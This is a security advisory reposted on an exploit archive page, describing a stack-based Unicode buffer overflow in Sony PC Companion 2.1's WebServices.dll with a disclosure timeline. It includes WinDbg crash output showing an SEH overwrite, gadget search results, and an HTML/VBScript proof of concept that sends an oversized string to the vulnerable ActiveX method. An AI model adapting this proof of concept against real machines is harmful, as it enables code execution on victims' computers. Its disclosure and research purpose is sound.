exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sony PC Companion 2.1 WebServices.dll Unicode Buffer Overflow

Sony PC Companion 2.1 WebServices.dll Unicode Buffer Overflow
Posted Dec 20, 2012
Authored by LiquidWorm | Site zeroscience.mk

Sony PC Companion version 2.1 suffers from a boundary error in WebServices.dll when handling the value assigned to the 'bstrFile' item in the DownloadURLToFile function and can be exploited to cause a stack-based buffer overflow via an overly long string which may lead to execution of arbitrary code on the affected machine.

tags | exploit, overflow, arbitrary
SHA-256 | 1b8f58d27bd44514aecfb7474faee685aaf87184b0f3d5a43bd93fe64016f4b9

Sony PC Companion 2.1 WebServices.dll Unicode Buffer Overflow

Change Mirror Download

Sony PC Companion 2.1 (DownloadURLToFile()) Stack-based Unicode Buffer Overload SEH


Vendor: Sony Mobile Communications AB
Product web page: http://www.sonymobile.com
Affected version: 2.10.115 (Production 27.1, Build 830)
2.10.108 (Production 26.1, Build 818)

Summary: PC Companion is a computer application that acts as a portal
to Sony Xperia and operator features and applications, such as phone
software updates, management of contacts and calendar, media management
with Media Go, and a backup and restore feature for your phone content.

Desc: The vulnerability is caused due to a boundary error in WebServices.dll
when handling the value assigned to the 'bstrFile' item in the DownloadURLToFile
function and can be exploited to cause a stack-based buffer overflow via an
overly long string which may lead to execution of arbitrary code on the
affected machine.


------------------------------------------------------------------------------

STATUS_STACK_BUFFER_OVERRUN encountered
(1120.16cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=001f0000 ecx=00000044 edx=001ee5d4 esi=00000000 edi=00000000
eip=00000000 esp=001ee558 ebp=001ee5d8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
00000000 ?? ???
0:000> !exchain
001eef24: 00430043
Invalid exception stack at 00420042
0:000> d 001eef24
001eef24 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.
001eef34 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef44 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef54 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef64 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef74 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef84 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef94 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0:000>

------------------------------------------------------------------------------

Found pop esi - pop ebp - ret 08 at 0x00040030 [wscript.exe]
** Unicode compatible **
** Null byte **
{PAGE_EXECUTE_READ}
[SafeSEH: Yes - ASLR : Yes]
[Fixup: Yes] - C:\Windows\System32\wscript.exe

--

Found pop esi - pop ebp - ret 0c at 0x0004007E [wscript.exe]
** Unicode compatible **
** Null byte **
{PAGE_EXECUTE_READ}
[SafeSEH: Yes - ASLR : Yes]
[Fixup: Yes] - C:\Windows\System32\wscript.exe

------------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Vendor status:

[09.11.2012] Vulnerability discovered in version 2.10.108 (Production 26.1, Build 818).
[15.11.2012] Contact with the vendor.
[16.11.2012] Vendor responds asking more details.
[18.11.2012] Sent detailed information to the vendor.
[21.11.2012] Asked vendor for status update.
[21.11.2012] Vendor is investigating the issue.
[30.11.2012] Vendor confirms the vulnerability.
[30.11.2012] Working with the vendor.
[03.12.2012] Version 2.10.115 (Production 27.1, Build 830) is released, still vulnerable.
[05.12.2012] Asked vendor for status update.
[06.12.2012] Vendor investigates, promising to share an update soon.
[12.12.2012] Asked vendor for scheduled patch release date.
[17.12.2012] No reply from vendor.
[18.12.2012] Asked vendor for status update.
[19.12.2012] No reply from vendor.
[19.12.2012] Notified the vendor that the advisory will be published on 20th of December.
[20.12.2012] Vendor promises patch in the first quarter of 2013.
[20.12.2012] Public security advisory released.


Advisory ID: ZSL-2012-5117
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5117.php

http://cwe.mitre.org/data/definitions/121.html


09.11.2012

---


<html>
<body>
<object classid='clsid:0F987E61-9C94-49FA-9B6D-2F99BDEB6CF6' id='overrun' />
<script language='vbscript'>
targetFile = "C:\Program Files\Sony\Sony PC Companion\WebServices.dll"
prototype = "Sub DownloadURLToFile ( ByVal bstrUrl As String , ByVal bstrFile As String )"
memberName = "DownloadURLToFile"
progid = "WebServicesLib.HttpClient"
argCount = 2

bstrUrl="defaultV"
bstrFile=String(758, "A") + "BB" + "CC" + String(4238, "D")

' ^ ^ ^ ^
' | | | |
'----------- junk --------- nseh - seh ------- junk --------

overrun.DownloadURLToFile bstrUrl, bstrFile

</script>
</body>
</html>
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close